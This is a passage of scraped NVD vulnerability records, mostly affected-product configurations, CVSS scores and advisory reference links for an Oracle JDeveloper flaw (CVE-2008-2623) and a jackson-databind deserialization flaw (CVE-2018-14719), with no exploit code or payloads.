"https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: 
"https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Vendor | Product | Version |
---|---|---|
oracle | jdeveloper | 10.1.2.3 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:10.1.2.3:*:*:*:*:*:*:*", matchCriteriaId: "1EAEAAF4-3DF9-40B0-BCCE-455932F885A2", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.3 allows local users to affect confidentiality via unknown vectors.", }, { lang: "es", value: "Vulnerabilidad no especificada en el componente Oracle JDeveloper en Oracle Application Server 10.1.2.3 permite a usuarios locales afectar la confidencialidad mediante vectores desconocidos.", }, ], evaluatorComment: "Note 2 in Oracle Application Server Risk Matrix states \"The versions in the matrix refer to standalone versions of JDeveloper.\" Therefore, Oracle Application Server was not included in the CPE configuration.", id: "CVE-2008-2623", lastModified: "2025-04-09T00:30:58.490", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "NONE", baseScore: 2.1, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], }, published: "2009-01-14T02:30:00.233", references: [ { source: "cve@mitre.org", url: "http://secunia.com/advisories/33525", }, { source: "cve@mitre.org", url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { source: "cve@mitre.org", url: "http://www.securityfocus.com/bid/33177", }, { source: "cve@mitre.org", url: "http://www.securitytracker.com/id?1021572", }, { source: "cve@mitre.org", url: "http://www.vupen.com/english/advisories/2009/0115", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", url: "http://secunia.com/advisories/33525", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securityfocus.com/bid/33177", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securitytracker.com/id?1021572", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.vupen.com/english/advisories/2009/0115", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "7036DA13-110D-40B3-8494-E361BBF4AFCD", versionEndExcluding: "2.6.7.3", versionStartIncluding: "2.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "B99066EB-FF79-4D9D-9466-B04AD4D3A814", versionEndExcluding: "2.7.9.5", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "F4D3858C-DAF3-4522-90EC-EFCD13BD121E", versionEndExcluding: "2.8.11.3", versionStartIncluding: "2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "4DA01839-5250-43A7-AFB7-871DC9B8AB32", versionEndExcluding: "2.9.7", versionStartIncluding: "2.9.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: 
"B887E174-57AB-449D-AEE4-82DD1A3E5C84", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:clusterware:12.1.0.2.0:*:*:*:*:*:*:*", matchCriteriaId: "6C9084DB-329E-403F-8D0A-5B9F53183714", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:11.2.0.4:*:*:*:*:*:*:*", matchCriteriaId: "C1E11A25-C7CE-49DF-99CA-352FD21B8230", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:12.1.0.2:*:*:*:*:*:*:*", matchCriteriaId: "4F3D40B7-925C-413D-AFF3-60BF330D5BC2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:12.2.0.1:*:*:*:*:*:*:*", matchCriteriaId: "5C614BA7-7103-4ED7-ADD0-56064FE256A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:18c:*:*:*:*:*:*:*", matchCriteriaId: "6833701E-5510-4180-9523-9CFD318DEE6A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:database_server:19c:*:*:*:*:*:*:*", matchCriteriaId: "B2204841-585F-40C7-A1D9-C34E612808CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "A9E97F04-00ED-48E9-AB40-7A02B3419641", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*", matchCriteriaId: "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "BB79BB43-E0AB-4F0D-A6EA-000485757EEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F238CB66-886D-47E8-8DC0-7FC2025771EB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "59B7B8AD-1210-4C40-8EF7-E2E8156630A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "0DE4A291-4358-42A9-A68D-E59D9998A1CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "A030A498-3361-46F8-BB99-24A66CAE11CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE", versionEndExcluding: "11.2.0.3.23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "BFD43191-E67F-4D1B-967B-3C7B20331945", versionEndExcluding: "12.2.0.1.19", versionStartIncluding: "12.2.0.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "062C588A-CBBA-470F-8D11-2F961922E927", versionEndExcluding: "13.9.4.2.1", versionStartIncluding: "13.9.4.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", 
matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "7A1E1023-2EB9-4334-9B74-CA71480F71C2", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*", matchCriteriaId: "93A4E178-0082-45C5-BBC0-0A4E51C8B1DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*", matchCriteriaId: "3F021C23-AB9B-4877-833F-D01359A98762", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*", matchCriteriaId: "2F8ED016-32A1-42EE-844E-3E6B2C116B74", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.2:*:*:*:*:*:*:*", matchCriteriaId: "A046CC2C-445F-4336-8810-930570B4FEC6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8:*:*:*:*:*:*:*", matchCriteriaId: "0745445C-EC43-4091-BA7C-5105AFCC6F1F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", matchCriteriaId: 
"792DF04A-2D1B-40B5-B960-3E7152732EB8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*", matchCriteriaId: "46525CA6-4226-4F6F-B899-D800D4DDE0B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9.0.0:*:*:*:*:*:*:*", matchCriteriaId: "9967AAFD-2199-4668-9105-207D4866B707", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "3A76E5BF-01E4-46E7-8E3B-5ACE75657360", versionEndExcluding: "3.11.153", versionStartIncluding: "3.11", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "E9A6D103-9674-4B04-8397-86501F1D91CF", versionEndExcluding: "4.6.26", versionStartIncluding: "4.6", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "D2452F48-6A8B-4274-B0CE-F1256F400170", versionEndExcluding: "4.1.18", versionStartIncluding: "4.1", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", matchCriteriaId: "142AD0DD-4CF3-4D74-9442-459CE3347E3A", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", matchCriteriaId: "5735E553-9731-4AAC-BCFF-989377F817B3", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:*:*:*:*:*:*:*:*", 
matchCriteriaId: "09A8C9D2-9FFF-4312-95FB-87D79B3C0339", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.", }, { lang: "es", value: "Las versiones 2.x de FasterXML jackson-databind anteriores a la 2.9.7 podrían permitir a los atacantes remotos ejecutar código arbitrario aprovechando un fallo para bloquear las clases blaze-ds-opt y blaze-ds-core de deserialización polimórfica.", }, ], id: "CVE-2018-14719", lastModified: "2024-11-21T03:49:40.010", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-01-02T18:29:00.387", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: 
"https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "cve@mitre.org", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: 
"cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", tags: [ 
"Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { 
source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-502", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Source | URL | Tags | |
---|---|---|---|
secalert_us@oracle.com | http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | Patch, Vendor Advisory | |
secalert_us@oracle.com | http://www.securityfocus.com/bid/102539 | Third Party Advisory, VDB Entry | |
secalert_us@oracle.com | http://www.securitytracker.com/id/1040207 | Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html | Patch, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/102539 | Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.securitytracker.com/id/1040207 | Third Party Advisory, VDB Entry |
